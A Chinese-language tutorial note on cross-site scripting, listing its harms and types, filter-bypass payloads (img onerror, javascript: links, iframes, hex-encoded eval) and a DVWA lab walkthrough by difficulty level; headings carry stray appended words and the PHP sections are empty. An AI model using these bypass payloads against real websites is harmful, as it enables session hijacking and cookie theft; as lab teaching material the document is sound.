xss总结漏洞篇

Xss漏洞javascript

Xss漏洞出如今1996年。Xss漏洞又名跨站脚本漏洞html

 

Xss可能形成的危害java

  1. 网站弹框(刷流量)
  2. 网站挂马
  3. 会话劫持
  4. Cookie被盗取
  5. 用户提权
  6. 帐号被盗
  7. 尽可能DDOS
  8. 蠕虫攻击

 

 

Xss分类web

1.储存型xssxss

2.反弹型xss网站

 

攻击spa

注意:当xss攻击执行不成功的时候,得想办法判断他为何不成功3d

是被过滤掉了呢,仍是没有闭合对应的标签。htm

 

<script>alert(‘xss’)</script>blog

0×04 过滤的解决办法

假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,只要能运行咱们的js就OK,好比用img标签或者a标签。咱们能够这样写

<img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')<a href=javascrip:alert('xss')>s</a> 点击s时运行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗

经常使用的攻击标签:img、iframescript,div,style,input,a,math,title等等

Xss过滤表:http://www.freebuf.com/articles/web/153055.html

Xss payload 大全:https://www.jianshu.com/p/3f16269c83db

新型的xss payload在推特关注:xss hack

Xss平台:

DVWA作个例子,低级->不可能

 

级别:低级:

描述:无任何过滤

Payload:<script>alert(‘xss’)</script>

 

 

Php代码:

 

 

 

 

级别:中级

描述:把script标签过滤了

Payload:<img src=1 onerror=alert(/xss/)>

 

Php代码:

 

 

 

级别:高级

描述:用正则过滤掉scrip

Payload:<img src=1 onerror=alert(/xss/)> 同样

 

 

Php代码:

 

 

 

 

不可能级别,把用户输入的实体化了,因此没有xss漏洞。